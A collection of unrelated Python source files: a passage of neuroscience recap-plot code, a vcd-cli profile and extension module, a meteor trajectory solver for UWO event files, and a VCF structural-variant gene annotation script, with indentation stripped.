ax_stim_recap = fig.add_subplot(gs[11:16,:])
plot_stim_recap_table(ax_stim_recap, df_stim)
ax_axon_terminals = fig.add_subplot(gs[17:27,1:10])
plot_composed_A_masks(ax_axon_terminals, A_matrix)
ax_sta_pos = fig.add_subplot(gs[20:25,11:])
plot_sta_positions(ax_sta_pos, checkerboard[0])
suptitle = " - ".join([cond, date, record_name+" n°"+str(record_id)])
plt.suptitle(suptitle)
pp.savefig()
plt.close()
for cell_idx, cell_db_id in zip(cell_indexes, cell_db_ids):
fig = plt.figure(figsize=(8.267717*2,11.69291*2)) #A4 values in inches(damn) *2
suptitle = " - ".join([cond, date, record_name+" n°"+str(record_id),
"Cell n°"+str(cell_idx), "Cell DB id n°"+str(cell_db_id)])
plt.suptitle(suptitle)
gs = gridspec.GridSpec(28, 20, left=0.05,
right=.95, top=.92,
bottom=.05, wspace=0.00, hspace=0.00)
#Template on electrodes
cell_loc_ax = fig.add_subplot(gs[0:4,0:4])
plot_cell_spatial(cell_loc_ax, A_matrix[cell_idx])
#Spike amplitude across time
calcium_trace_ax = fig.add_subplot(gs[0:4,5:])
plot_calcium_trace(calcium_trace_ax, cell_traces[:, cell_idx])
plot_stim_epochs_to_calcium(calcium_trace_ax, reM, y_pos=-0.3)
#Checkerboard STA
if checkerboard is not None:
pval_checker = checkerboard[1][cell_idx]
pval_checker = np.min(pval_checker[pval_checker!=0])
inner_grid = gridspec.GridSpecFromSubplotSpec(4, 4,
subplot_spec=gs[5:12,0:12], wspace=.09, hspace=.13)
plot_2d_sta(checkerboard[0][cell_idx][::4], pval=pval_checker, grid=inner_grid)
#Fullfield flickering STA
if fullfield_fl is not None:
pval_fffl = fullfield_fl[1][cell_idx]
pval_fffl = np.min(pval_fffl[pval_fffl!=0])
sp_amp_ax = fig.add_subplot(gs[5:12,13:])
plot_t_sta(sp_amp_ax, fullfield_fl[0][cell_idx], pval=pval_fffl)
#Chirp_FM
if chirp_fm is not None:
chirpfm_ax = fig.add_subplot(gs[13:16,:])
plot_chirp(chirpfm_ax, chirp_fm[0], chirp_fm[1][:,cell_idx])
chirpfm_ax.set_title("Chirp FM")
#Chirp_AM
if chirp_am is not None:
chirpam_ax = fig.add_subplot(gs[17:20,:])
plot_chirp(chirpam_ax, chirp_am[0], chirp_am[1][:,cell_idx])
chirpam_ax.set_title("Chirp AM")
#Flickering bars
if fl_bars is not None:
pval_bars = fl_bars[1][cell_idx]
pval_bars = np.min(pval_bars[pval_bars!=0])
fl_bars_ax = fig.add_subplot(gs[21:,:12])
plot_fl_bars(fl_bars_ax, fl_bars[0][cell_idx], pval=pval_bars)
fl_bars_ax.set_title("Flickering_bars")
#Moving gratings
if moving_gratings is not None:
#The very small values of calcium need a normalization to higher values
# for plotting purpose
all_val = None
for i, (k,v) in enumerate(moving_gratings.items()):
if all_val is None:
all_val = np.zeros((len(moving_gratings), *v[0].shape))
all_val[i] = v[0]
for k,v in moving_gratings.items():
moving_gratings[k] = ((v[0].T / np.max(all_val, axis=(0,2))).T*100, *v[1:])
ds_ax = fig.add_subplot(gs[21:,13:], projection="polar")
plot_ds_wheel(ds_ax, moving_gratings, cell_idx=cell_idx)
pp.savefig()
plt.close()
print("Cell n°",cell_idx,"done")
sns.set()
plt.rcdefaults()
print()
# Cell
def plot_recap_vitro_ephy(title_dict, reM, phy_dict, cluster_ids, df_stim, cell_db_ids=None,
checkerboard=None, fullfield_fl=None, fl_bars=None, chirp_am=None,
chirp_fm=None, moving_gratings=None, export_path="./recap_plot.pdf"):
"""Plot the recapitulating form of in vitro electrophy records
title_dict -> A dictionnary containing the str info for the title: keys(condition, date, record_name, record_id)
reM -> The record master object of the record
phy_dict -> A dictionnary containing the matrix obtained from phy (see utils.phy_results_dict())
cluster_ids -> A list of the cluster id used by phy corresponding to the good cells analysed
cell_db_ids -> A list of the database ids of the cells corresponding to cluster_ids
checkerboard -> A matrix of STA of cells to the checkerboard stimulus of shape (n_cell, 16, height, width)
fullfield_fl -> A matrix of STA of cells to the fullfield_flicker stimulus of shape (n_cell, 16)
fl_bars -> A matrix of STA of cells to the flickering_bars stimulus of shape (n_cell, 16, height, width)
chirp_am -> A tuple of the chirp_am obtained from a pipe, where [0] is the stimulus and [1] the cells response
chirp_fm -> Same as chirp_am but for a chirp_fm stimulus
moving_gratings -> The dict of response obtained from utils.group_direction_response
export_path -> The path for a pdf file to be exported. If None, the plot is displayed.
"""
print("Generating the recap plot")
configure_pyplot_recap()
cond = title_dict["condition"]
date = title_dict["date"]
record_name = title_dict["record_name"]
record_id = title_dict["record_id"]
if cell_db_ids is None:
cell_db_ids = [-1]*len(cluster_ids)
with PdfPages(export_path) as pp:
#Plotting Cover
fig = plt.figure(figsize=(8.267717*2,11.69291*2)) #A4 values in inches *2
gs = gridspec.GridSpec(28, 20, left=0.05, right=.95, top=.92, bottom=.05, wspace=0.00, hspace=0.00)
ax_rem = fig.add_subplot(gs[:10,2:-1])
reM.plot(ax_rem)
ax_stim_recap = fig.add_subplot(gs[11:16,:])
plot_stim_recap_table(ax_stim_recap, df_stim)
suptitle = " - ".join([cond, date, record_name+" n°"+str(record_id)])
plt.suptitle(suptitle)
pp.savefig()
plt.close()
for cluster, cell_id in zip(cluster_ids, cell_db_ids):
reM_cell_idx = reM["S_matrix"][0].attrs["cell_map"][cluster]#np.where(cluster==cluster_ids)[0][0]
fig = plt.figure(figsize=(8.267717*2,11.69291*2)) #A4 values in inches *2
suptitle = " - ".join([cond, date, record_name+" n°"+str(record_id),
"Cluster n°"+str(cluster), "Cell id n°"+str(cell_id)])
plt.suptitle(suptitle)
mask_cluster = phy_dict["spike_clusters"]==cluster
cluster_composition = np.unique(phy_dict["spike_templates"][mask_cluster])
gs = gridspec.GridSpec(28, 20, left=0.05, right=.95, top=.92, bottom=.05, wspace=0.00, hspace=0.00)
#Template on electrodes
cell_loc_ax = fig.add_subplot(gs[0:4,0:4])
plot_spike_template_MEA(cell_loc_ax, cluster_composition, phy_dict["templates"], phy_dict["channel_positions"])
#Autocorrelogram
autocorr_ax = fig.add_subplot(gs[0:4,5:9])
plot_autocorrelogram(autocorr_ax, cluster, phy_dict["spike_times"], phy_dict["spike_clusters"],
bin_ms=.001, sampling_rate=30000, tails=30)
#Spike amplitude across time
sp_amp_ax = fig.add_subplot(gs[0:4,10:])
plot_spike_amplitudes(sp_amp_ax, cluster, phy_dict["spike_templates"], phy_dict["spike_clusters"],
phy_dict["spike_times"], phy_dict["amplitudes"])
plot_stim_epochs_to_spikes(sp_amp_ax, reM, y_pos=0.6)
#Checkerboard STA
if checkerboard is not None:
pval_checker = checkerboard[1][reM_cell_idx]
pval_checker = np.min(pval_checker[pval_checker!=0])
inner_grid = gridspec.GridSpecFromSubplotSpec(4, 4,
subplot_spec=gs[5:12,0:12], wspace=.09, hspace=.13)
plot_2d_sta(checkerboard[0][reM_cell_idx], pval=pval_checker, grid=inner_grid)
#Fullfield flickering STA
if fullfield_fl is not None:
pval_fffl = fullfield_fl[1][reM_cell_idx]
pval_fffl = np.min(pval_fffl[pval_fffl!=0])
sp_amp_ax = fig.add_subplot(gs[5:12,13:])
plot_t_sta(sp_amp_ax, fullfield_fl[0][reM_cell_idx], pval=pval_fffl)
#Chirp_FM
if chirp_fm is not None:
chirpfm_ax = fig.add_subplot(gs[13:16,:])
plot_chirp(chirpfm_ax, chirp_fm[0], chirp_fm[1][:,reM_cell_idx], smooth=False)
chirpfm_ax.set_title("Chirp FM")
#Chirp_AM
if chirp_am is not None:
chirpam_ax = fig.add_subplot(gs[17:20,:])
plot_chirp(chirpam_ax, chirp_am[0], chirp_am[1][:,reM_cell_idx], smooth=False)
chirpam_ax.set_title("Chirp AM")
#Flickering bars
if fl_bars is not None:
pval_bars = fl_bars[1][reM_cell_idx]
pval_bars = np.min(pval_bars[pval_bars!=0])
fl_bars_ax = fig.add_subplot(gs[21:,:12])
plot_fl_bars(fl_bars_ax, fl_bars[0][reM_cell_idx], pval=pval_bars)
#Moving gratings
if moving_gratings is not None:
ds_ax = fig.add_subplot(gs[21:,13:], projection="polar")
plot_ds_wheel(ds_ax, moving_gratings, cell_idx=reM_cell_idx)
pp.savefig()
plt.close()
print("Cell cluster n°",cluster,"done")
sns.set()
plt.rcdefaults()
print()
# Cell
def plot_recap_vivo_ephy_dome(title_dict, reM, phy_dict, cluster_ids, cell_db_ids=None,
checkerboard=None, fullfield_fl=None, chirp_am=None,
chirp_fm=None, moving_gratings=None, export_path="./recap_plot.pdf"):
"""Plot the recapitulating form of in vivo electrophy records
title_dict -> A dictionnary containing the str info for the title: keys(condition, date, record_name, record_id)
reM -> The record master object of the record
phy_dict -> A dictionnary containing the matrix obtained from phy (see utils.phy_results_dict())
cluster_ids -> A list of the cluster id used by phy corresponding to the good cells analysed
cell_db_ids -> A list of the database ids of the cells corresponding to cluster_ids
checkerboard -> A matrix of STA of cells to the checkerboard stimulus of shape (n_cell, 16, height, width)
fl_bars -> A matrix of STA of cells to the flickering_bars stimulus of shape (n_cell, 16, height, width)
chirp_am -> A tuple of the chirp_am obtained from a pipe, where [0] is the stimulus and [1] the cells response
chirp_fm -> Same as chirp_am but for a chirp_fm stimulus
moving_gratings -> The dict of response obtained from utils.group_direction_response
export_path -> The path for a pdf file to be exported. If None, the plot is displayed.
"""
print("Generating the recap plot")
configure_pyplot_recap()
shanks_idx = buszaki_shank_channels(phy_dict["channel_positions"])
cond = title_dict["condition"]
date = title_dict["date"]
record_name = title_dict["record_name"]
record_id = title_dict["record_id"]
if cell_db_ids is None:
cell_db_ids = [-1]*len(cluster_ids)
with PdfPages(export_path) as pp:
#Plotting Cover
fig = plt.figure(figsize=(8.267717*2,11.69291*2)) #A4 values in inches *2
gs = gridspec.GridSpec(28, 20, left=0.05, right=.95, top=.92, bottom=.05, wspace=0.00, hspace=0.00)
ax_rem = fig.add_subplot(gs[:10,2:-1])
reM.plot(ax_rem)
suptitle = " - ".join([cond, date, record_name+" n°"+str(record_id)])
plt.suptitle(suptitle)
pp.savefig()
plt.close()
for cluster, cell_id in zip(cluster_ids, cell_db_ids):
reM_cell_idx = reM["S_matrix"][0].attrs["cell_map"][cluster]#np.where(cluster==cluster_ids)[0][0]
fig = plt.figure(figsize=(8.267717*2,11.69291*2)) #A4 values in inches *2
suptitle = " - ".join([cond, date, record_name+" n°"+str(record_id),
"Cluster n°"+str(cluster), "Cell id n°"+str(cell_id)])
plt.suptitle(suptitle)
mask_cluster = phy_dict["spike_clusters"]==cluster
cluster_composition = np.unique(phy_dict["spike_templates"][mask_cluster])
gs = gridspec.GridSpec(28, 20, left=0.05, right=.95, top=.92, bottom=.05, wspace=0.00, hspace=0.00)
#Template on electrodes
cell_loc_ax = fig.add_subplot(gs[0:4,0:2])
plot_spike_template(cell_loc_ax, cluster_composition, phy_dict["templates"], shanks_idx, phy_dict["channel_positions"])
#Autocorrelogram
autocorr_ax = fig.add_subplot(gs[0:4,3:7])
plot_autocorrelogram(autocorr_ax, cluster, phy_dict["spike_times"], phy_dict["spike_clusters"],
bin_ms=.001, sampling_rate=30000, tails=30)
#Spike amplitude across time
sp_amp_ax = fig.add_subplot(gs[0:4,8:])
plot_spike_amplitudes(sp_amp_ax, cluster, phy_dict["spike_templates"], phy_dict["spike_clusters"],
phy_dict["spike_times"], phy_dict["amplitudes"])
plot_stim_epochs_to_spikes(sp_amp_ax, reM, y_pos=0.6)
#Checkerboard STA
if checkerboard is not None:
pval_checker = checkerboard[1][reM_cell_idx]
pval_checker = np.min(pval_checker[pval_checker!=0])
inner_grid = gridspec.GridSpecFromSubplotSpec(2, 8,
subplot_spec=gs[5:12,:], wspace=.09, hspace=.13)
plot_dome_checker(checkerboard[0][reM_cell_idx], s=8, pval=pval_checker, grid=inner_grid)
#Fullfield flickering STA
if fullfield_fl is not None:
pval_fffl = fullfield_fl[1][reM_cell_idx]
pval_fffl = np.min(pval_fffl[pval_fffl!=0])
# sp_amp_ax = fig.add_subplot(gs[5:12,13:])
sp_amp_ax = fig.add_subplot(gs[21:,:12])
plot_t_sta(sp_amp_ax, fullfield_fl[0][reM_cell_idx], pval=pval_fffl)
#Chirp_FM
if chirp_fm is not None:
chirpfm_ax = fig.add_subplot(gs[13:16,:])
plot_chirp(chirpfm_ax, chirp_fm[0], chirp_fm[1][:,reM_cell_idx], smooth=False)
chirpfm_ax.set_title("Chirp FM")
#Chirp_AM
if chirp_am is not None:
chirpam_ax = fig.add_subplot(gs[17:20,:])
plot_chirp(chirpam_ax, chirp_am[0], chirp_am[1][:,reM_cell_idx], smooth=False)
chirpam_ax.set_title("Chirp AM")
#Moving gratings
if moving_gratings is not None:
ds_ax = fig.add_subplot(gs[21:,13:], projection="polar")
plot_ds_wheel(ds_ax, moving_gratings, cell_idx=reM_cell_idx)
pp.savefig()
plt.close()
print("Cell cluster n°",cluster,"done")
sns.set()
plt.rcdefaults()
print() |
<gh_stars>1-10
# vCloud CLI 0.1
#
# Copyright (c) 2014-2018 VMware, Inc. All Rights Reserved.
#
# This product is licensed to you under the
# Apache License, Version 2.0 (the "License").
# You may not use this product except in compliance with the License.
#
# This product may include a number of subcomponents with
# separate copyright notices and license terms. Your use of the source
# code for the these subcomponents is subject to the terms and
# conditions of the subcomponent's license, as noted in the LICENSE file.
#
import click
import yaml
from vcd_cli.profiles import Profiles
from vcd_cli.utils import restore_session
from vcd_cli.utils import stderr
from vcd_cli.utils import stdout
from vcd_cli.vcd import abort_if_false
from vcd_cli.vcd import vcd
@vcd.group(short_help='manage profiles')
@click.pass_context
def profile(ctx):
"""Manage user profiles
"""
pass
@profile.command('info', short_help='show details of current profile')
@click.pass_context
def info(ctx):
try:
profiles = Profiles.load()
click.echo(yaml.dump(profiles.data, default_flow_style=False))
except Exception as e:
stderr(e, ctx)
@profile.group(short_help='work with vcd-cli extensions')
@click.pass_context
def extension(ctx):
"""Manage vcd-cli extensions.
\b
Description
Manages commands added to vcd-cli.
\b
New commands can be added to vcd-cli as Python modules. The module
containing the commands implementation needs to be present in the
Python path.
\b
Examples
vcd profile extension list
List the extension modules currently registered with vcd-cli.
\b
vcd profile extension add container_service_extension.client.cse
Add to vcd-cli the commands to work with CSE, located in the
specified Python module.
\b
vcd profile extension delete container_service_extension.client.cse
Removes the CSE commands from vcd-cli.
\b
Files
~/.vcd-cli/profiles.yaml (macOS and Linux)
%userprofile%/.vcd-cli/profiles.yaml (Windows)
The extension modules are registered in the profiles file.
"""
pass
@extension.command('list', short_help='list vcd-cli extensions')
@click.pass_context
def list_extensions(ctx):
try:
profiles = Profiles.load()
if 'extensions' in profiles.data and \
profiles.data['extensions'] is not None:
for extension in profiles.data['extensions']:
click.echo(extension)
except Exception as e:
stderr(e, ctx)
@extension.command(short_help='add a vcd-cli extension')
@click.pass_context
@click.argument('module')
def add(ctx, module):
try:
profiles = Profiles.load()
if 'extensions' not in profiles.data or \
profiles.data['extensions'] is None:
profiles.data['extensions'] = []
if module not in profiles.data['extensions']:
profiles.data['extensions'].append(module)
profiles.save()
click.secho('Extension added from module \'%s\'.' % module)
else:
raise Exception('module already in the profile')
except Exception as e:
stderr('Could not add extension from module \'%s\'' % module, ctx)
@extension.command(short_help='delete a vcd-cli extension')
@click.pass_context
@click.argument('module')
@click.option(
'-y',
'--yes',
is_flag=True,
callback=abort_if_false,
expose_value=False,
prompt='Are you sure you want to delete the extension?')
def delete(ctx, module):
try:
profiles = Profiles.load()
profiles.data['extensions'].remove(module)
profiles.save()
click.secho('Extension from module \'%s\' deleted.' % module)
except Exception as e:
stderr('Could not delete extension from module \'%s\'' % module, ctx)
@vcd.command(short_help='current resources in use')
@click.pass_context
def pwd(ctx):
"""Current resources in use
"""
try:
restore_session(ctx)
host = ctx.obj['profiles'].get('host')
user = ctx.obj['profiles'].get('user')
in_use_org_name = ctx.obj['profiles'].get('org_in_use')
in_use_vdc_name = ctx.obj['profiles'].get('vdc_in_use')
in_use_vapp_name = ctx.obj['profiles'].get('vapp_in_use')
message = ('connected to %s as \'%s\'\n' +
'using org: \'%s\', vdc: \'%s\', vApp: \'%s\'.') % \
(host, user, in_use_org_name, in_use_vdc_name,
in_use_vapp_name)
stdout({
'host': host,
'user': user,
'org': in_use_org_name,
'vdc': in_use_vdc_name,
'vapp': in_use_vapp_name
}, ctx, message)
except Exception as e:
stderr(e, ctx)
|
<filename>wmpl/Formats/EventUWO.py
""" Recompute the meteor trajectory from UWO-format event.txt files. """
import os
import sys
import numpy as np
from wmpl.Formats.GenericArgumentParser import addSolverOptions
from wmpl.Trajectory.GuralTrajectory import GuralTrajectory
from wmpl.Trajectory.Trajectory import Trajectory
from wmpl.Utils.TrajConversions import jd2Date
class StationData(object):
def __init__(self, jd_ref, lat, lon, height, station_id):
""" Container for station data. """
self.jd_ref = jd_ref
self.station_id = station_id
self.lon = lon
self.lat = lat
self.height = height
self.time_data = []
self.theta_data = []
self.phi_data = []
self.mag_data = []
def __repr__(self):
out_str = ""
out_str += "StationData object:\n"
out_str += " JD ref: {:s}\n".format(str(self.jd_ref))
out_str += " Time ref: {:s}\n".format(jd2Date(self.jd_ref, \
dt_obj=True).strftime("%Y-%m-%d %H:%M:%S.%f"))
out_str += " Lat: {:.6f} deg\n".format(np.degrees(self.lat))
out_str += " Lon: {:.6f} deg\n".format(np.degrees(self.lon))
out_str += " Ele: {:.2f} m\n".format(self.height)
out_str += "\n"
out_str +=" Time, Theta, Phi, Mag\n"
for t, th, phi, mag in zip(self.time_data, np.degrees(self.theta_data), np.degrees(self.phi_data), \
self.mag_data):
out_str += "{:7.3f}, {:9.6f}, {:10.6f}, {:+6.2f}\n".format(t, th, phi, mag)
return out_str
def loadEventData(event_file_path):
""" Load observation data from the event file. """
with open(event_file_path) as f:
observers = {}
data_points = {}
for line in f:
line = line.replace('\n', '').replace('\r', '')
# Check if the line gives general event data
if line.startswith("dat"):
# Parse the observer string
line = line.replace("dat ; ", '')
entries = line.split()
# Store the data into a dictionary
data_dict = {entries[i]: entries[i + 1] for i in range(len(entries) - 1)}
# Check if the line gives an observer
elif line.startswith("obs"):
# Parse the observer string
line = line.replace("obs ; ", '')
entries = line.split()
# Store the observer into a dictionary
obs_dict = {entries[i]: entries[i + 1] for i in range(len(entries) - 1)}
# Store the observers dictionary with the tag as the key
observers[obs_dict["tag"]] = obs_dict
# Check if the line gives an observation
elif line.startswith("fit"):
# Parse the observation string
line = line.replace("fit ; ", '')
entries = line.split()
# Store the observation into a dictionary
point_dict = {entries[i]: entries[i + 1] for i in range(len(entries) - 1)}
# Store the observation with the tag-no as the key
data_points[point_dict["tag"] + "-" + point_dict["no"]] = point_dict
# Get the reference Julian date
jd_ref = float(data_dict["jd"])
dir_path = os.path.dirname(event_file_path)
# Init the dictionary containing the observations
station_data_dict = {}
station_data_dict["jd_ref"] = jd_ref
station_data_dict["dir_path"] = dir_path
station_data_dict["station_data"] = []
# Pair up observatins with stations and create StationData objects
for obs_tag in observers:
# Fetch all time, theta, phi, mag data from observations for this station
data = []
for point_key in data_points:
# Check if the point starts with the observers tag
if point_key.split("-")[0] == obs_tag:
# Extract observations
data.append(list(map(float, [data_points[point_key]["t"], data_points[point_key]["th"], \
data_points[point_key]["phi"], data_points[point_key]["mag"]])))
# Sort the observations in time
data = np.array(data)
data = data[np.argsort(data[:, 0])]
# Init the station data object
lat = np.radians(float(observers[obs_tag]["lat"]))
lon = np.radians(float(observers[obs_tag]["lon"]))
elev = 1000*float(observers[obs_tag]["elv"])
stat_data = StationData(jd_ref, lat, lon, elev, observers[obs_tag]["num"])
# Add the position picks
stat_data.time_data = data[:, 0]
stat_data.theta_data = np.radians(data[:, 1])
stat_data.phi_data = np.radians(data[:, 2])
stat_data.mag_data = data[:, 3]
# Add the station to the list of observers
station_data_dict["station_data"].append(stat_data)
return station_data_dict
def solveTrajectoryUWOEvent(station_data_dict, solver='original', velmodel=3, **kwargs):
""" Runs the trajectory solver on points of the given type.
Keyword arguments:
solver: [str] Trajectory solver to use:
- 'original' (default) - "in-house" trajectory solver implemented in Python
- 'gural' - Pete Gural's PSO solver
velmodel: [int] Velocity propagation model for the Gural solver
0 = constant v(t) = vinf
1 = linear v(t) = vinf - |acc1| * t
2 = quadratic v(t) = vinf - |acc1| * t + acc2 * t^2
3 = exponent v(t) = vinf - |acc1| * |acc2| * exp( |acc2| * t ) (default)
"""
# Check that there are at least two stations present
if len(station_data_dict["station_data"]) < 2:
print('ERROR! The event.txt file does not contain multistation data!')
return False
if solver == 'original':
# Init the new trajectory solver object
traj = Trajectory(station_data_dict["jd_ref"], output_dir=station_data_dict["dir_path"], \
meastype=4, **kwargs)
elif solver.startswith('gural'):
# Extract velocity model is given
try:
velmodel = int(solver[-1])
except:
# Default to the exponential model
velmodel = 3
# Select extra keyword arguments that are present only for the gural solver
gural_keys = ['max_toffset', 'nummonte', 'meastype', 'verbose', 'show_plots']
gural_kwargs = {key: kwargs[key] for key in gural_keys if key in kwargs}
# Init the new Gural trajectory solver object
traj = GuralTrajectory(len(station_data_dict["station_data"]), station_data_dict["jd_ref"], \
velmodel, verbose=1, output_dir=station_data_dict["dir_path"], meastype=4, \
**gural_kwargs)
# Infill trajectories from each site
for stat_data in station_data_dict["station_data"]:
# MC solver
if solver == 'original':
traj.infillTrajectory(stat_data.phi_data, stat_data.theta_data, stat_data.time_data, \
stat_data.lat, stat_data.lon, stat_data.height, \
station_id=stat_data.station_id, magnitudes=stat_data.mag_data)
# Gural solver
else:
traj.infillTrajectory(stat_data.phi_data, stat_data.theta_data, stat_data.time_data, \
stat_data.lat, stat_data.lon, stat_data.height)
print('Filling done!')
# Solve the trajectory
traj.run()
return traj
if __name__ == "__main__":
import argparse
# Init the command line arguments parser
arg_parser = argparse.ArgumentParser(description="Run the trajectory solver on the given UWO-format event.txt file.")
arg_parser.add_argument('event_path', nargs=1, metavar='MET_PATH', type=str, \
help='Full path to the event.txt file.')
# Add other solver options
arg_parser = addSolverOptions(arg_parser)
# Parse the command line arguments
cml_args = arg_parser.parse_args()
#########################
event_path = os.path.abspath(cml_args.event_path[0])
# Check if the file path exists
if not os.path.isfile(event_path):
print('No such file:', event_path)
sys.exit()
max_toffset = None
if cml_args.maxtoffset:
max_toffset = cml_args.maxtoffset[0]
velpart = None
if cml_args.velpart:
velpart = cml_args.velpart
vinitht = None
if cml_args.vinitht:
vinitht = cml_args.vinitht[0]
# Load observations from the event.txt file
station_data_dict = loadEventData(event_path)
# Run trajectory solver on the loaded .met file
solveTrajectoryUWOEvent(station_data_dict, solver=cml_args.solver, max_toffset=max_toffset, \
monte_carlo=(not cml_args.disablemc), mc_runs=cml_args.mcruns, \
geometric_uncert=cml_args.uncertgeom, gravity_correction=(not cml_args.disablegravity),
plot_all_spatial_residuals=cml_args.plotallspatial, plot_file_type=cml_args.imgformat, \
show_plots=(not cml_args.hideplots), v_init_part=velpart, v_init_ht=vinitht) |
<gh_stars>1-10
import getopt
from sys import argv, exit
import multiprocessing
import pysam
import pybedtools
## capture the arguments required for the annotations;
## 1) the annotation file ; 2) the VCF to be annotated ; 3) the name of the output file [O] otherwise, same name + anno.vcf
## if further arguments are necessary we will deal with that later
def usage(scriptname):
print(
"USAGE: \n" + scriptname + '-i <inputfile[M]> -o <outputfilename[O]> -a <AnnotationFilename(BED-formatFile)[M]>\n')
def processArgs(scriptname, argv):
global vcf
global annof
global outvcfname;
outvcfname = "";
try:
opts, args = getopt.getopt(argv, "hi:a:o:", ["vcf=", "annof=", "outvcfname="])
print(opts)
except getopt.GetoptError:
usage(scriptname)
exit(2)
for opt, arg in opts:
if opt == '-h':
usage(scriptname);
exit()
elif opt in ("-i", "--vcf"):
vcf = arg
elif opt in ("-a", "--annof"):
annof = arg
elif opt in ("-o", "--outvcfname"):
outvcfname = arg
## check args values and input requirements
if vcf is None or annof is None:
usage(scriptname);
exit(2)
if outvcfname is None or outvcfname == "":
outvcfname = ''.join(str(vcf) + ".anno.vcf")
print('VCF is: ',
vcf); ## iput file is a list of the filename we need to process in the loop; Filename can be full path or relative assuming the right current folder
print('annof is: ', annof)
print('outvcfname is: ', outvcfname)
def getAnno(LR, RR, genes):
"""
:param LR: BedTool object with only one position defined for the Left Breakpoint of the current SV ; LR stands for Left Region
:param RR: BedTool object with only one position defined for the Right Breakpoint of the current SV ; RR stands for Right Region
:param genes: BedTool object with all the gene annotations in bedformat
:return: tuple of strings (gene_name(s),dist,strand)
"""
return ([getClosestUpstream(LR, genes), getIsec(LR, genes), getClosesetDownstream(LR, genes),
getClosestUpstream(RR, genes), getIsec(RR, genes), getClosesetDownstream(RR, genes)])
def getIsec(locus, genes):
"""
:param locus: BedTool object with only one position defined
:param genes: BedTool object with all the gene annotations in bedformat
:return: tuple of strings (gene_name(s),dist,strand)
"""
isec = locus.intersect(genes, wao=True)
if isec is None or isec == "":
return (".___.", "0", ".") ## print("NO Intersection with any gene")
gene = set(isec.to_dataframe().iloc[0:1, 6]).pop() ## here we keep only the first gene in the list
strand = set(isec.to_dataframe().iloc[0:1, 8]).pop()
if gene == ".":
return (".___.", "0", ".")
return ((str(gene), str(0), str(strand)))
def getClosestUpstream(locus, genes):
"""
:param locus: BedTool object with only one position defined
:param genes: BedTool object with all the gene annotations in bedformat
:return: tuple of strings (gene_name(s),dist,strand)
"""
theclosest = locus.closest(genes, io=True, fu=True, D="a", d=True, t="first")
if theclosest is None or theclosest == "":
return ((".___.", "0", ".")) ## print("NO Closest Gene upstream with any gene")
gene = set(theclosest.to_dataframe().iloc[0:1, 6]).pop() ## here we keep only the first gene in the list
if gene == ".":
return (".___.", "0", ".")
dist = set(theclosest.to_dataframe().iloc[0:1, 9]).pop()
strand = set(theclosest.to_dataframe().iloc[0:1, 8]).pop()
return ((str(gene), str(dist), str(strand)))
def getClosesetDownstream(locus, genes):
"""
:param locus: BedTool object with only one position defined
:param genes: BedTool object with all the gene annotations in bedformat
:return: tuple of strings (gene_name(s),dist,strand)
"""
theclosest = locus.closest(genes, io=True, fd=True, D="a", d=True, t="first")
if theclosest is None or theclosest == "":
# print("NO Closest Gene Downstream with any gene")
return ((".___.", str(0), "."))
gene = set(theclosest.to_dataframe().iloc[0:1, 6]).pop() ## here we keep only the first gene in the list
if gene == ".":
return (".___.", "0", ".")
dist = set(theclosest.to_dataframe().iloc[0:1, 9]).pop()
strand = set(theclosest.to_dataframe().iloc[0:1, 8]).pop()
return ((str(gene), str(dist), str(strand)))
def getGenesOverlappinRegion(rec, genes):
"""
:param rec: vcf record pysam-formatted
:param genes: BedTool object with all the gene annotations in bedformat
:return: tuple of strings (gene_name(s))
"""
NOGENE=str(set([".___."]))
if rec.info['SVTYPE']=="TRA":
return NOGENE
chr1 = rec.chrom
POS1 = rec.pos
POS2 = rec.info['ENDPOSSV']
if int(POS2) < int(POS1):
POS1 = rec.info['ENDPOSSV'] ; POS2 = rec.pos ;
locus = pybedtools.BedTool(' '.join([chr1, str(POS1-1), str(POS2)]), from_string=True)
isec = locus.intersect(genes, wao=True)
if isec is None or isec == "":
return NOGENE ## print("NO Intersection with any gene")
gene = set(isec.to_dataframe().iloc[0::, 6]) ## here we get ALL the Genes in column 6
# strand = set(isec.to_dataframe().iloc[0:, 8]).pop()
if gene == "." or gene == "{'.'}":
return NOGENE
return (str(gene))
def getLenghtRegion(rec):
"""
:param rec: vcf record pysam-formatted
:return: lenght of the region of interest; pos2-pos1;
"""
if rec.info['SVTYPE']=="TRA":
return (-1);
return abs(rec.info['ENDPOSSV']-rec.pos)
def newHeaders(myvcf):
myvcf.header.info.add("RGENUPS", "3", "String",
"Gene,DistToBreakPoint,Strand for Upstream Gene to the Right BreakPoint")
myvcf.header.info.add("RGENISEC", "3", "String",
"Gene,DistToBreakPoint,Strand for Gene Intersecting the Right BreakPoint")
myvcf.header.info.add("RGENDNS", "3", "String",
"Gene,DistToBreakPoint,Strand for Downstream Gene to the Right BreakPoint")
myvcf.header.info.add("LGENUPS", "3", "String",
"Gene,DistToBreakPoint,Strand for Upstream Gene to the Left BreakPoint")
myvcf.header.info.add("LGENISEC", "3", "String",
"Gene,DistToBreakPoint,Strand for Gene Intersecting the Left BreakPoint")
myvcf.header.info.add("LGENDNS", "3", "String",
"Gene,DistToBreakPoint,Strand for Downstream Gene to the Left BreakPoint")
myvcf.header.info.add("GENELISTbtwBP", ".", "String",
"List of genes between the two defined breakpoint for DEL, DUP, INS, and INV")
myvcf.header.info.add("LENSV", "1", "Integer",
"Length of the SV for DEL, DUP, INS, and INV; TRA will have lenght of 0")
return myvcf
def write_new_vcf(vcf, newheader, LVAR, outfilename=""):
if outfilename is None or outfilename == "":
outfilename = "".join([str(vcf), ".parallel.anno.vcf"])
with open(outfilename, "w") as f:
f.write(str(newheader))
print("in write_new_vcf")
for record in LVAR:
f.write(str(record))
def main(scriptname, argv):
processArgs(scriptname, argv)
import time
from pybedtools import BedTool
global genes
genes = BedTool(annof).sort()
## we read the entire vcf file at once or we stream the record and process the extraction of the required info to annotate the breakpoints
vcfr = pysam.VariantFile(vcf, "r")
## updating header with new info Tags
vcfr = newHeaders(vcfr)
my_list = [variant for variant in vcfr]
from multiprocessing import Pool
import logging
logger = multiprocessing.log_to_stderr()
logger.setLevel(multiprocessing.SUBDEBUG)
pool = Pool(processes=12) # start 4 worker processes
result_list = pool.map(func=annotateVariant_parallel, iterable=iter(my_list))
print(logger)
with open('outFile.vcf', 'w') as out_file:
out_file.writelines(result_list)
def annotateVariant_parallel(i):
res = annotateVariant(i)
return res
def annotateVariant(i):
rec = my_list[i]
chr1 = rec.chrom
chr2 = rec.info['CHR2']
POS1 = rec.pos
POS2 = rec.info['ENDPOSSV']
rec.info['LENSV'] = getLenghtRegion(rec)
